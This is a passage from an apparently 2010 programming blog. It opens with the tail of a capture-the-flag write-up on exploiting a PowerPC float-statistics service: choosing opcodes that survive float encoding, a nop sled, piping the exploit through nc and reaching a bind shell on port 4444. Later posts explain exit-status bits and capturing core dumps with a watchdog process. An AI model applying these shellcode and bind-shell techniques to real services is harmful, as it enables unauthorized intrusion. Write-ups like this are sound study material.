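The same round-trip check can be mirrored in Python, which makes it easy to test individual opcodes. This is a rough equivalent of the C snippet rather than a translation of it; survives_text_round_trip is a name I chose, and the explicit NaN test stands in for the C code's g != u.f comparison.

```python
import math
import struct


def word_to_float(word):
    """Reinterpret a 32-bit integer as a big-endian IEEE 754 single."""
    return struct.unpack(">f", struct.pack(">I", word))[0]


def survives_text_round_trip(word):
    """True if printing the word as a float and parsing the text back
    reproduces exactly the same 32 bits."""
    value = word_to_float(word)
    if math.isnan(value):
        return False  # "nan" as text cannot carry the original bit pattern
    text = "%.64f" % value
    return struct.pack(">f", float(text)) == struct.pack(">I", word)


for opcode in (0x7fc3f378, 0x7fe00008, 0x38600002):
    print(hex(opcode), survives_text_round_trip(opcode))
```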

Time to bust out the Power ISA. Let’s find some instructions we can replace those with that encode properly. We want to avoid any instruction that begins with the bits 011111111 or 111111111. After some perusing through the opcode maps, I found that “addi r3,r30,0”, encoded as 387e0000, would be a suitable replacement for “mr r3,r30”, and “twi 15,r0,0”, encoded as 0de00000, would be a suitable replacement for “trap”. The trap instruction isn’t actually necessary; it’s just a safety in case the system call to exec() to execute the shell fails, but I decided to replace it anyways.
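Both replacement instructions use the PowerPC D-form layout (6-bit primary opcode, two 5-bit fields, 16-bit immediate), so their encodings and the "bad prefix" test can be double-checked with a few lines of Python. The helper names below are mine, for illustration only.

```python
def encode_d_form(opcode, rt, ra, imm):
    """Encode a PowerPC D-form instruction as a 32-bit word."""
    return (opcode << 26) | (rt << 21) | (ra << 16) | (imm & 0xFFFF)


def has_all_ones_exponent(word):
    """True if bits 30-23 are all ones, i.e. the word starts with
    011111111 or 111111111 and would decode as NaN or infinity."""
    return ((word >> 23) & 0xFF) == 0xFF


addi = encode_d_form(14, 3, 30, 0)  # addi r3,r30,0 (primary opcode 14)
twi = encode_d_form(3, 15, 0, 0)    # twi 15,r0,0   (primary opcode 3)

for name, word in (("addi", addi), ("twi", twi),
                   ("mr", 0x7fc3f378), ("trap", 0x7fe00008)):
    print(name, "%08x" % word, has_all_ones_exponent(word))
```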

Throw in a standard nop sled, and we’re done! Here’s the final exploit code. Run as:

$ ./pp400-exploit | nc localhost 4138
Send me some floats (max of 16), I will tell you some stats!
The average of your 148 numbers is inf
The standard deviation of your 148 numbers is inf

# Open up a new shell and connect to the bind shell
nc localhost 4444
id
uid=504(luser) gid=504(luser) groups=504(luser)
pwd
/Users/luser

Huzzah! We have a bind shell!

Now I mentioned earlier that I didn’t get around to solving this during the contest, so I don’t know if this exploit would have worked against the target machine. I do know, however, that since the PowerPC exploit worked flawlessly on my x86 Mac, it wouldn’t have mattered whether the target machine was actually PPC or x86 (though I did have to tweak the length of the nop sled and the buffer address to jump to until it worked, since the program has different behavior when running under the debugger and when not). Props to Rosetta for correctly translating code generated at runtime.

And that, my friends, is an anatomy of an exploit.

You could have done all that, or you could have realized that this problem was identical to pp400 from last year. I of course didn’t realize this since I didn’t compete last year, but one of my teammates pointed this out to me (yet somehow I lost the motivation to keep working on this problem…). That unofficial writeup to which I just linked was taken down during the contest, presumably because the writers were competing again and didn’t want to give other teams an advantage, though my teammate had a copy of the text. In any case, I still had fun solving this.

One more note about exit statuses

adam — Thu, 20 May 2010 01:14:41 +0000

Last week, I mentioned in passing that Windows allows the full range of 32-bit exit codes. That’s true, but only if you directly call ExitProcess() (or its less-friendly kin TerminateProcess()).

If you just call exit() (or return from main(), which implicitly calls exit()), then like in the *NIX world, you only get the bottom 8 bits of the exit status—see MSDN’s exit() documentation. So for portability’s sake, don’t use exit statuses above 255 unless you really, really need to.

So what’s in an exit status anyways?

adam — Thu, 13 May 2010 05:02:27 +0000

Last time, we saw how we can capture a process’ core dump. The astute reader will have noticed that we seem to be pulling bits out of thin air:

int status;
if(wait(&status) < 0)
  perror("wait");
if(WIFSIGNALED(status) && WCOREDUMP(status))
...

We’ve got a 32-bit exit status, and yet we seem to be getting two more useful bits of information out of it from the WIFSIGNALED() and WCOREDUMP() macros. How is that possible?

Well, what you thought was a 32-bit exit status really isn’t 32 bits. In fact, it’s quite a bit less than that. The C standard only guarantees one useful bit. Quoth section 7.20.4.3, paragraph 5, of the C99 standard, which describes the exit(3) function:

Finally, control is returned to the host environment. If the value of status is zero or EXIT_SUCCESS, an implementation-defined form of the status successful termination is returned. If the value of status is EXIT_FAILURE, an implementation-defined form of the status unsuccessful termination is returned. Otherwise the status returned is implementation-defined.

Recall that implementation-defined means the C standard doesn’t define what happens, but the implementation (in this case, the GNU C library, or the Microsoft C library, etc.) must document the decision it made. Contrast this with undefined behavior, in which anything could happen (including erasing your hard drive), and nowhere does what happens have to be documented.

So if you want to write portable code, you only get one bit of information in your exit status: successful or unsuccessful termination, which is good enough for most applications. If you go this route, it’s a good idea to use the EXIT_SUCCESS and EXIT_FAILURE macros, but it’s by no means necessary. You can still use 0 and something non-0 (1 is a popular, and good, choice), and it will still work pretty much anywhere if you’re not unlucky. But the only truly 100% portable unsuccessful status is EXIT_FAILURE.

Screw that. You want more than one bit of information in your exit status. There’s a whole 32 bits (or occasionally 16 or 64 on some non-standard systems) in an int, so why can’t we use them? On Linux, the exit(3) man page clearly states we get 8 bits:

The exit() function causes normal process termination and the value of status & 0377 is returned to the parent (see wait(2)).

Mac OS X likewise provides 8 bits (though that fact is a little more subtle in the documentation there). Windows fares better: it provides the full 32 bits via the GetExitCodeProcess() function. The discussion here, though, is going to focus on Linux and Mac OS X.

8 bits. Much more useful than 1, though not quite the 32 you might have been hoping for. It’s enough to express a varied gamut of exit statuses (incorrect usage, file not found, other unexpected error, etc.).

A consequence of this behavior is if you exit with a status that is a multiple of 256, that’s indistinguishable from 0, which means you’re likely exiting with a successful status when you meant it to be unsuccessful. Oops.

As a quick example, try out these shell commands ($? is a special parameter that evaluates to the exit status of the last child process or pipeline run by the shell):

$ bash -c 'exit 5'; echo $?     # Prints 5
$ bash -c 'exit 256'; echo $?   # Prints 0 (!)

Now that we’ve figured out we only have 8 bits that come with an exit status, it’s clear how the WIFSIGNALED() and WCOREDUMP() macros work: wait(2) stuffs extra information into the status in addition to the child process’ exit status (you could have figured that out by reading the man page, but you obviously didn’t since you’re here reading this).

One final word of caution: be careful about exit statuses of 128 and above. When a process is terminated due to a signal (say, because it segfaulted, resulting in a SIGSEGV), the shell reports its exit status as 128 plus the signal number. Yes, a parent process can tell if the child process was terminated by a signal or by calling exit() by checking with WIFSIGNALED(), but it’s not always possible to get at that information when you want it. If you’re executing commands in the bash shell, you can get at the exit status quite easily with $?, but you can’t get at the other bits returned by wait(), at least not in any way I know. To keep things simple, if you never use exit statuses of 128 or above, then anyone can unambiguously determine that an exit status of 0–127 means a normal exit, and an exit status of 128–255 means an abnormal exit.

In summary, use only EXIT_SUCCESS and EXIT_FAILURE for maximally portable code, and otherwise use only 0–127 for code that will be portable to Linux, Mac OS X, and Windows (and probably other not-uncommon systems that are still in current use but with which I’m not familiar enough to comment).

Dumping core

adam — Sat, 24 Apr 2010 00:52:30 +0000

Your program just crashed, and you didn’t have a debugger attached. You can’t reproduce the crash after many attempts. How do you debug the problem?

Well, if your program had left a core dump, you could easily attach a debugger postmortem and get some kind of idea what state the program was in before it died. A core dump is essentially a dump of all memory in your program’s virtual address space: stack, heap, code and everything else.

On most systems, though, you won’t get a core dump when you crash, where a crash can come from a segfault (or any other signal), a call to abort(3) (such as via a failed assertion), a call to terminate() (such as via throwing an uncaught exception), or other similar avenues. Core dumps are rather large (after all, it’s all of the memory from the process); they can easily be tens or hundreds of megabytes, even for simple programs, due to a large number of shared libraries being loaded. Your hard drive would fill up very quickly if every program that crashed left a core dump.

If you’re just poking around in the shell, you can enable core dumps with ulimit(1) to raise the core dump file size limit from 0 (the default) to something non-zero such as unlimited. This will cause any crashing programs spawned by that shell to leave core dumps. For example:

$ cat crash.c
int main(void)
{
    *(int *)1 = 2;  // cause a segfault
}
$ gcc crash.c -o crash
$ ./crash
Segmentation fault
$ ulimit -c unlimited
$ ./crash
Segmentation fault (core dumped)

Where the core dump ends up depends on your operating system. By default, Linux puts it in a file named core in the current working directory, and Mac OS X puts it in a file named /cores/core.PID, where PID is the process ID of the process that crashed. The exact name and location may vary by flavor and version of OS. See the core(5) man page for detailed discussion of core files on Linux.

OK, so that’s all well and good if someone has the good nature to run ulimit before running your program, but few (if any) people will do so. If you want to say, “No really, I want core dumps!”, you can call setrlimit(2) to set the limit for yourself and any child processes (which is all ulimit really does). Just make sure not to annoy your users by filling up their hard drives with core dumps. Which of course you won’t do because your code is perfect and never crashes anyways.

You’ve gone through the trouble of creating a core dump, but when your program crashes in some far away land, how do you actually get your hands on the core dump? You could ask your users to email it to you, but they’re not going to do that. They’re just going to complain on the Internet that your software sucks and that people shouldn’t use it. Some operating systems have a nice Crash Reporter or Error Reporting Service, but those send crash reports to first parties, something you might not want, and getting the crash data back to you is far from trivial.

One solution is to install your own error handlers in-process to catch things such as segfaults, so that instead of letting the operating system handle the error, you handle it yourself: you do your own stack trace, grab important data such as filenames, optionally pop up a UI asking the user whether they want to send an error report and add supplemental information, and send the crash report your way. This is a lot of work, and it’s also dangerous: if your program has crashed, there’s no telling what state it’s in. Trying to do something like sending an email from a signal handler could easily fail: your heap might be corrupted, so you could crash again the moment you do something as mundane as try to allocate some memory. If you decide to go this route, a good place to start would be with signal(2)/sigaction(2) (*nix and OS X) or Structured Exception Handling (Windows).

A solution that I like better is out-of-process. Just let the process crash and dump core as before, but this time we’ll have a watchdog process running. The watchdog just waits for the main process to exit (normally or abnormally); if it sees an abnormal exit and a core dump, then it sends off the crash report into the ether. This is much safer, since you don’t have to worry about things such as a corrupted heap when sending a crash report. The only downside is that you now have twice as many processes running.

Here’s a full example of a watchdog with core dumps. The program forks, with the parent as the watchdog. The child intentionally crashes, and then the parent grabs the core dump if one was made.

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

int main(int argc, char **argv)
{
  // Try to enable core dumps
  struct rlimit core_limit;
  core_limit.rlim_cur = RLIM_INFINITY;
  core_limit.rlim_max = RLIM_INFINITY;
  
  if(setrlimit(RLIMIT_CORE, &core_limit) < 0)
    fprintf(stderr, "setrlimit: %s\nWarning: core dumps may be truncated or nonexistent\n", strerror(errno));


  int status;
  switch(fork())
  {
  case 0:
    // We are the child process -- run the actual program
    *(int *)1 = 2;  // segfault
    break;

  case -1:
    // An error occurred, shouldn't happen
    perror("fork");
    return -1;

  default:
    // We are the parent process -- wait for the child process to exit
    if(wait(&status) < 0)
      perror("wait");
    printf("child exited with status %d\n", status);
    if(WIFSIGNALED(status) && WCOREDUMP(status))
    {
      printf("got a core dump\n");
      // find core dump, email it to your servers, etc.
    }
  }
  
  return 0;
}

If you compile and run this program, you’ll get a core dump from the child process, which the parent process will detect, and it can then do whatever it wants with it. Email it to you, upload it to a server, analyze it and trim it down before doing those, or anything else you can write code to do. All from the safety of an uncrashed process. If you run ulimit -c 0 before running this program, you’ll see the warning about setrlimit failing and you won’t get a core dump. This is because, if you look at the documentation for setrlimit, you’ll see that the soft limit can never exceed the hard limit, and an unprivileged process can only lower its hard limit, never raise it.

So there you have it. You now have a way to have your software dump core when it crashes and send those core dumps back to you without any extra hassle on the user’s part. Though depending on who your users are, it may still be a good idea to ask them if they want to send a crash report before actually doing so, since core dumps can easily contain private information in them. If you had anything like usernames or passwords in memory anywhere in your process, they’ll be in the core dump. So keep that in mind and take appropriate measures to protect users’ privacy. Encrypt the core dump if necessary. Maybe even attach a cryptographic signature to ensure authenticity.

Links for further enrichment:

Mac OS X debugging magic, lots of great debug-fu for Mac OS X
XCrashReport (part 2) (part 3) (part 4), a nifty in-process crash reporter for Windows
And for your amusement: Kill -9 Bill